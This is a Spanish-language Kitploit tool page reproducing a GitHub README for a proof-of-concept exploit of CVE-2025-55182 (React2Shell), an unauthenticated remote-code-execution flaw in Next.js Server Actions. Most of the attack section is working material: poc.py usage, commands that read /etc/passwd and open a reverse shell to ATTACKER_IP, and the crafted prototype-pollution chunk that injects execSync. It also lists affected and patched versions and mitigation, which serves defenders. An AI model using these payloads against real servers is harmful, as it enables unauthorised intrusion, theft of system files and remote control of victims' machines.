Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nextjs-CVE-2025-55182 — Exploit de prueba de concepto para RCE crítica no autenticada en Server Actions de Next.js mediante deserialización del Protocolo Flight de React, permitiendo la ejecución de comandos arbitrarios en servidores vulnerables. | Kitploit
Herramientas/GitHubGitHub/d0cnull/nextjs-cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
d0cnull/nextjs-cve-2025-55182

nextjs-CVE-2025-55182

Exploit de prueba de concepto para RCE crítica no autenticada en Server Actions de Next.js mediante deserialización del Protocolo Flight de React, permitiendo la ejecución de comandos arbitrarios en servidores vulnerables.

Ver Repositorio
hace 8 mesesAún no revisado

CVE-2025-55182 / CVE-2025-66478 (React2Shell) - Prueba de Concepto (PoC) de Ejecución Remota de Código (RCE) en Next.js

Vulnerabilidad crítica en las Server Actions de Next.js que permite Ejecución Remota de Código sin autenticación a través de la deserialización del Protocolo React Flight

Descripción general

Este repositorio contiene una Prueba de Concepto (PoC) para la vulnerabilidad crítica RCE que afecta a aplicaciones Next.js que utilizan Server Actions (React Server Functions).

DetalleInformación
CVECVE-2025-55182 / CVE-2025-66478
GravedadCrítica (CVSS 10.0)
React AfectadoReact 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js AfectadoNext.js 15.x, 16.x, 14.3.0-canary.77+
No AfectadoNext.js 14.x estable, 13.x, Pages Router, Edge Runtime
Next.js Corregido15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
React Corregido19.0.1, 19.1.2, 19.2.1
TipoEjecución Remota de Código (RCE)
Autenticación RequeridaNinguna

Descripción de la vulnerabilidad

La vulnerabilidad existe en cómo el Protocolo React Flight deserializa fragmentos durante el procesamiento de Server Actions. Un atacante puede explotar la contaminación de prototipos mediante datos de formulario manipulados para:

  1. Acceder al constructor Function a través de la cadena de prototipos (__proto__)
  2. Ejecutar código JavaScript arbitrario en el servidor
  3. Lograr Ejecución Remota de Código completa sin autenticación

Esto ocurre antes de cualquier validación de la server action, lo que lo hace explotable en cualquier aplicación Next.js que tenga Server Actions habilitadas.

Aplicaciones afectadas

Cualquier aplicación Next.js es vulnerable si:

  • Utiliza Server Actions (por defecto en App Router)
  • Ejecuta Next.js 15.x o 16.x (o 14.3.0-canary.77+)
  • No tiene mitigaciones específicas implementadas

Uso

Requisitos

root@kitploit:~
pip install requests

Ejecutar el PoC

root@kitploit:~
python3 poc.py <TARGET_URL> "<COMMAND>"

Ejemplos

root@kitploit:~
# Test command execution
python3 poc.py http://localhost:3000 "id"

# Read sensitive files
python3 poc.py http://localhost:3000 "cat /etc/passwd"

# Reverse shell (for authorized testing only)
python3 poc.py http://localhost:3000 "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Salida de ejemplo

root@kitploit:~
$ python3 poc.py http://localhost:3000 "whoami"
500
0:{"a":"$@1","f":"","b":"development"}
1:E{"digest":"www-data","message":"NEXT_REDIRECT","stack":[],"env":"Server"}

La salida del comando aparece en el campo digest.

Detalles técnicos

El exploit aprovecha el mecanismo de resolución de fragmentos del Protocolo React Flight:

root@kitploit:~
crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"process.mainModule.require('child_process').execSync('{cmd}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

Cadena de ataque:

  1. Recorrido de prototipos a través de $1:__proto__:then
  2. Acceso al constructor Function a través de $1:constructor:constructor
  3. Inyección de código arbitrario a través del campo _prefix
  4. El código se ejecuta durante la deserialización (pre-autenticación)

Mitigación

Actualice inmediatamente:

root@kitploit:~
npm install next@latest
# or
pnpm update next

Versiones parcheadas: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Nota: Next.js 14.x estable y 13.x NO son vulnerables.

Aviso legal

⚠️ Este PoC es solo para fines educativos y pruebas de seguridad autorizadas.

El acceso no autorizado a sistemas informáticos es ilegal. Solo use esta herramienta en sistemas que posea o para los que tenga permiso explícito para probar. Los autores no se responsabilizan por cualquier uso indebido.

Créditos

Basado en la investigación original de @msanft. Todo el crédito por el descubrimiento de la vulnerabilidad y el PoC inicial les pertenece.

Referencias

  • Investigación original de CVE-2025-55182
  • Aviso oficial de Next.js sobre el CVE
  • Análisis de Wiz Research - React2Shell
  • React Flight Protocol
  • NIST NVD - CVE-2025-55182

Palabras clave

Ejecución Remota de Código en Next.js, Vulnerabilidad en Next.js, CVE-2025-55182, CVE-2025-66478, React2Shell, Exploit de React Server Components, RCE en Server Actions de Next.js, Contaminación de prototipos en Next.js, Vulnerabilidad del Protocolo React Flight, Seguridad en Next.js, Ejecución remota de código en Next.js, PoC de exploit en Next.js, Vulnerabilidad en Server Actions, RCE en React RSC

Descargar herramienta